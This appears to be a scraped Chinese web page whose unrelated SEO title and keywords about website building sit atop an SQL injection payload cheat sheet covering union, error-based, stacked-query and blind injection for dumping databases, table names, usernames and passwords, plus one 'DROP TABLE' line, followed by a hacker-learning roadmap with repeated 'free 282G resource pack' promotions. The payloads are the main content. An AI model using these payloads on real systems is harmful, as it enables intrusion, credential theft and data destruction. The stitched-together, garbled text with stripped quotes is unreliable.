企业官网建设流程全解析

网站的前端和后台,郓城县建设局网站,深圳网站制作作,今天最新体育新闻SQL 联合注入Payload #查字段 1 order by 1# 1 order by 100# #联合查询(假设字段为3) -1 union select 1,2,3# //-1使页面报错#xff0c;方便显示 #查所有数据库名(假设回显为2) -1 union select 1,database(),3# -1 union select 1,database(),3 from info…SQL联合注入Payload#查字段 1 order by 1# 1 order by 100# #联合查询(假设字段为3) -1 union select 1,2,3# //-1使页面报错方便显示 #查所有数据库名(假设回显为2) -1 union select 1,database(),3# -1 union select 1,database(),3 from information_schema.tables# #查看版本 -1 union select 1,version(),3# #查指定库的表名 -1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema库名# #查指定表的列名 -1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema库名 and table_name表名# #查看指定列名的内容 -1 union select 1,group_concat(列名1,0x3a,列名2),3 from 库名.列名#报错注入Payloadextractvalue函数#extractvalue() //空格和被过滤的情况 1^extractvalue(1,concat(0x5c,(select(database()))))# //爆库名 1^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(库名))))# //查表名 1^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like(表名))))# //查列名 1^extractvalue(1,concat(0x7e,(select(left(列名,30))from(库名.表名))))# //查从左数30个字段 1^extractvalue(1,concat(0x7e,(select(right(列名,30))from(库名.表名))))#updatexml函数#updatexml()函数 1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)# //爆库 1 and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema库名 limit 0,1),0x7e),1)# //查表名 1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema库名 and table_name表名 limit 0,1),0x7e),1)# //查列名 1 and updatexml(1,concat(0x7e,(select concat(username,0x3a,password) from users limit 0,1),0x7e),1)# //查数据BigInt数据类型溢出#BigInt数据类型溢出--exp()或pow() 1 and exp(~(select * from (select user())a))# //查看当前库的权限 1 and exp(~(select * from (select table_name from information_schema.tables where table_schemadatabase() limit 0,1)a))# //查表名 1 and exp(~(select * from (select column_name from information_schema.columns where table_name表名 limit 0,1)a))# //查列名 1 and exp(~(select * from(select 列名 from 表名 limit 0,1)))# //获取对应信息floor函数#floor()函数 1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#堆叠注入Payload常规查询语句1;show databases;# //查库名· 1;show tables;# //查表名 1;show columns from 表名;# //查列名,表名用反引号包围 rename改表改列1;RENAME TABLE 表1 TO 表2;RENAME TABLE 表3 TO 表1;ALTER TABLE 表1 CHANGE 列1 列2 VARCHAR(100) ;show columns from 表1;# //将表1改名为表2将表3改名为表1再将表1的列1改为列2最后查看表1的列名信息 //适用于查看没有权限的表 handler读取表中数据1;HANDLER 表名 OPEN;HANDLER 表名 READ FIRST;HANDLER 表名 CLOSE;# //此方法使用于在查列时select被禁的情况逻辑为打开指定表名读取表中第一行数据关闭表并释放资源。set转换操作符1;set sql_modePIPES_AS_CONCAT;select 1 //适用于后端代码采用||判断的情况。sql预处理PREPARE hacker from concat(s,elect, * from 表名 ); EXECUTE hacker;# //绕过特定字符串的过滤 setahex编码值;prepare hacker from a;execute hacker;# //结合hex(进制)编码实现绕过 盲注Payload基于布尔盲注Payloadid1 AND (SELECT COUNT(*) FROM users) 0id1 AND SUBSTRING((SELECT version()), 1, 1) 5id1 AND ASCII(SUBSTRING((SELECT password FROM users WHERE usernameadmin), 1, 1)) 97id1 AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_schemapublic) 10id1 AND LENGTH((SELECT database())) 6基于时间盲注Payloadid1; IF((SELECT COUNT(*) FROM users) 0, SLEEP(5), NULL)id1; IF((SELECT ASCII(SUBSTRING((SELECT password FROM users WHERE usernameadmin), 1, 1))) 97, BENCHMARK(10000000, MD5(a)), NULL)id1; IF(EXISTS(SELECT * FROM information_schema.tables WHERE table_schemapublic AND table_nameusers), BENCHMARK(5000000, SHA1(a)), NULL)id1; IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_nameusers) 5, SLEEP(2), NULL)id1; IF((SELECT SUM(LENGTH(username)) FROM users) 20, BENCHMARK(3000000, MD5(a)), NULL)错误基于盲注Payloadid1 UNION ALL SELECT 1,2,table_name FROM information_schema.tablesid1 UNION ALL SELECT 1,2,column_name FROM information_schema.columns WHERE table_nameusersid1 UNION ALL SELECT username,password,3 FROM usersid1; SELECT * FROM users WHERE usernameadmin --id1; DROP TABLE users; --布尔盲注判断数据库名称长度1 and length(database())20 # //判断数据库名称长度是否大于20SELECT length(Hello World); -- 输出 11 SELECT length(column_name) FROM table_name; -- 计算表中某一列的长度获取数据库名称组成1 and ascii(substr(database(),1,1))20 #判断表个数1 and (select count(table_name) from information_schema.tables where table_schemadatabase()) 10#获取表名称长度1 and length((select table_name from information_schema.tables where table_schemadatabase() limit 0,1)) 10 #1 and ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1))100 #//第一个字符 1 and ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 1,1),1,1))判断表达式 # //第二个字符 1 and ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 1,1),2,1))判断表达式 # //第三个字符 1 and ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 1,1),2,1))判断表达式 #获取列数1 and (select count(column_name) from information_schema.columns where table_schemadatabase() and table_name表名)判断表达式 #获取列名长度//判断第一个列名长度 1 and length(substr((select column_name from information_schema.columns where table_name users limit 0,1),1))判断表达式 # //判断第二个列名长度 1 and length(substr((select column_name from information_schema.columns where table_name users limit 1,1),1))判断表达式 #获取列名字符组成//获取 users 表中第一个列名的第一个字符 1 and ascii(substr((select column_name from information_schema.columns where table_name userslimit0,1),1,1))判断表达式 # //获取 users 表中第二个列名的第一个字符 1 and ascii(substr((select column_name from information_schema.columns where table_name users limit 1,1),1,1))判断表达式 # //获取 users 表中第三个列名的第一个字符 1andascii(substr((select column_name from information_schema.columns where table_name userslimit2,1),1,1))判断表达式 # //获取 users 表中第三个列名的第二个字符 1 and ascii(substr((select column_name from information_schema.columns where table_name users limit 2,1),2,1))判断表达式 # //获取 users 表中第三个列名的第三个字符 1andascii(substr((select column_name from information_schema.columns where table_name userslimit2,1),3,1))判断表达式 #获取字段长度//获取列中第一个字段长度 1 and length(substr((select user from users limit 0,1),1))判断表达式 # //获取列中第二个字段长度 1 and length(substr((select user from users limit 1,1),1))判断表达式 #获取字段//获取第一个字段的第一个字符 1 and ascii(substr((selectuserfromuserslimit0,1),1,1))判断表达式 # //获取第一个字段的第二个字符 1 and ascii(substr((select user from users limit 0,1),2,1))判断表达式 # //获取第二个字段的第一个字符 1andascii(substr((selectuserfromuserslimit1,1),1,1))判断表达式 # //获取第二个字段的第二个字符 1 and ascii(substr((select user from users limit 1,1),2,1))判断表达式 #判断数据库名称长度1 and if(length(database())1,sleep(5),1) if(expr1,expr2,expr3)函数判断数据库名称组成1 and if(ascii(substr(database(),1,1))90,sleep(5),1)#判断表个数1 and if((select count(table_name) from information_schema.tables where table_schemadatabase())2,sleep(5),1)获取表名称长度1 and if(length((select table_name from information_schema.tables where table_schemadatabase() limit 0,1))9,sleep(5),1) #获取表名称组成1 and (select ascii(substr(table_name, 1, 1)) from information_schema.tables where table_schema dvwa limit 1) 100 and sleep(5)#//获得第一个表名称的第二个字符 1 and (select ascii(substr(table_name, 2, 1)) from information_schema.tables where table_schema dvwa limit 1)判断表达式 and sleep(5)# //获得第一个表名称的第三个字符 1 and (select ascii(substr(table_name, 3, 1)) from information_schema.tables where table_schema dvwa limit 1)判断表达式 and sleep(5)#//获得第二个表名称的第一个字符 1 and (selectascii(substr(table_name, 1, 1)) from (select table_name from information_schema.tables where table_schema dvwalimit1,1) as second_table limit1) 判断表达式 andsleep(5)# //获得第二个表名称的第二个字符 1 and (select ascii(substr(table_name, 2, 1)) from (select table_name from information_schema.tables where table_schema dvwa limit 1,1) as second_table limit 1) 判断表达式 and sleep(5)# //获得第二个表名称的第三个字符 1and (selectascii(substr(table_name, 3, 1)) from (select table_name from information_schema.tables where table_schema dvwalimit1,1) as second_table limit1) 判断表达式 andsleep(5)# //以此类推获取列数1 and if((select count(column_name) from information_schema.columns where table_schemadatabase() and table_name guestbook)3,sleep(5),1) #获取列名长度1 and if(length(substr((select column_name from information_schema.columns where table_name guestbook limit 0,1),1))判断表达式,sleep(5),1) #获取列名字符组成获取第一个列名的第一个字符1 and if((select ascii(substr(column_name, 1, 1)) from information_schema.columns where table_name guestbook limit 0,1) 判断表达式, sleep(5), 1) #//获取第一个列名的第二个字符 1 and if((selectascii(substr(column_name, 2, 1)) from information_schema.columns where table_name guestbooklimit0,1) 判断表达式, sleep(5), 1) # //获取第一个列名的第三个字符 1 and if((select ascii(substr(column_name, 3, 1)) from information_schema.columns where table_name guestbook limit 0,1) 判断表达式, sleep(5), 1) # //获取第二个列名的第一个字符 1andif((selectascii(substr(column_name, 1, 1)) from information_schema.columns where table_name guestbooklimit1,1) ASCII_VALUE, sleep(5), 1) # //获取第二个列名的第二个字符 1 and if((select ascii(substr(column_name, 2, 1)) from information_schema.columns where table_name guestbook limit 1,1) ASCII_VALUE, sleep(5), 1) # //获取第二个列名的第三个字符 1andif((selectascii(substr(column_name, 3, 1)) from information_schema.columns where table_name guestbooklimit1,1) ASCII_VALUE, sleep(5), 1) # //获取第三个列名的第一个字符 1 and if((select ascii(substr(column_name, 1, 1)) from information_schema.columns where table_name guestbook limit 2,1) ASCII_VALUE, sleep(5), 1) #获取字段1 and if((select ascii(substring(column_name, 1, 1)) from information_schema.columns where table_name users limit 0,1)判断表达式, sleep(5), 1) #//获取 user 列名的第一个字段的第二个字符 1 and if((selectascii(substring(column_name, 2, 1)) from information_schema.columns where table_name userslimit0,1)判断表达式, sleep(5), 1) # //获取 user 列名的第一个字段的第三个字符 1 and if((select ascii(substring(column_name, 3, 1)) from information_schema.columns where table_name users limit 0,1)判断表达式, sleep(5), 1) # //获取 user 列名的第二个字段的第一个字符 1andif((SELECTASCII(SUBSTRING(column_name, 1, 1)) FROM information_schema.columns WHERE table_name usersLIMIT1, 1)判断表达式, sleep(5), 1) # //获取 user 列名的第二个字段的第二个字符 1 and if((SELECT ASCII(SUBSTRING(column_name, 2, 1)) FROM information_schema.columns WHERE table_name users LIMIT 1, 1)判断表达式, sleep(5), 1) # //获取 user 列名的第二个字段的第三个字符 1andif((selectascii(substring(column_name, 3, 1)) from information_schema.columns where table_name userslimit1,1)判断表达式, sleep(5), 1) #网络安全的知识多而杂怎么科学合理安排下面给大家总结了一套适用于网安零基础的学习路线应届生和转行人员都适用学完保底6k就算你底子差如果能趁着网安良好的发展势头不断学习日后跳槽大厂、拿到百万年薪也不是不可能初级黑客1、网络安全理论知识2天①了解行业相关背景前景确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。非常重要2、渗透测试基础一周①渗透测试的流程、分类、标准②信息收集技术主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理利用方法、工具MSF、绕过IDS和反病毒侦察④主机攻防演练MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础一周①Windows系统常见功能和命令②Kali Linux系统常见功能和命令③操作系统安全系统入侵排查/系统加固基础4、计算机网络基础一周①计算机网络基础、协议和架构②网络通信原理、OSI模型、数据转发流程③常见协议解析HTTP、TCP/IP、ARP等④网络攻击技术与网络安全防御技术⑤Web漏洞原理与防御主动/被动攻击、DDOS攻击、CVE漏洞复现5、数据库基础操作2天①数据库基础②SQL语言基础③数据库安全加固6、Web渗透1周①HTML、CSS和JavaScript简介②OWASP Top10③Web漏洞扫描工具④Web渗透工具Nmap、BurpSuite、SQLMap、其他菜刀、漏扫等恭喜你如果学到这里你基本可以从事一份网络安全相关的工作比如渗透测试、Web 渗透、安全服务、安全分析等岗位如果等保模块学的好还可以从事等保工程师。薪资区间6k-15k到此为止大概1个月的时间。你已经成为了一名“脚本小子”。那么你还想往下探索吗想要入坑黑客网络安全的朋友给大家准备了一份282G全网最全的网络安全资料包免费领取网络安全大礼包《黑客网络安全入门进阶学习资源包》免费分享7、脚本编程初级/中级/高级在网络安全领域。是否具备编程能力是“脚本小子”和真正黑客的本质区别。在实际的渗透测试过程中面对复杂多变的网络环境当常用工具不能满足实际需求的时候往往需要对现有工具进行扩展或者编写符合我们要求的工具、自动化脚本这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中想要高效地使用自制的脚本工具来实现各种目的更是需要拥有编程能力.零基础入门建议选择脚本语言Python/PHP/Go/Java中的一种对常用库进行编程学习搭建开发环境和选择IDE,PHP环境推荐Wamp和XAMPP IDE强烈推荐Sublime·Python编程学习学习内容包含语法、正则、文件、 网络、多线程等常用库推荐《Python核心编程》不要看完·用Python编写漏洞的exp,然后写一个简单的网络爬虫·PHP基本语法学习并书写一个简单的博客系统熟悉MVC架构并试着学习一个PHP框架或者Python框架 (可选)·了解Bootstrap的布局或者CSS。8、高级黑客这部分内容对零基础的同学来说还比较遥远就不展开细说了贴一个大概的路线。网络安全工程师企业级学习路线很多小伙伴想要一窥网络安全整个体系这里我分享一份打磨了4年已经成功修改到4.0版本的**《平均薪资40w的网络安全工程师学习路线图》**对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。如果你想要入坑黑客网络安全工程师这份282G全网最全的网络安全资料包网络安全大礼包《黑客网络安全入门进阶学习资源包》免费分享​​​​​​学习资料工具包压箱底的好资料全面地介绍网络安全的基础理论包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等将基础理论和主流工具的应用实践紧密结合有利于读者理解各种主流工具背后的实现机制。​​​​​​网络安全源码合集工具包​​​​视频教程​​​​视频配套资料国内外网安书籍、文档工具​​​​​ 因篇幅有限仅展示部分资料需要点击下方链接即可前往获取黑客/网安大礼包CSDN大礼包《黑客网络安全入门进阶学习资源包》免费分享好了就写到这了,大家有任何问题也可以随时私信问我!希望大家不要忘记点赞收藏哦!特别声明此教程为纯技术分享本文的目的决不是为那些怀有不良动机的人提供及技术支持也不承担因为技术被滥用所产生的连带责任本书的目的在于最大限度地唤醒大家对网络安全的重视并采取相应的安全措施从而减少由网络安全而带来的经济损失。本文转自网络如有侵权请联系删除。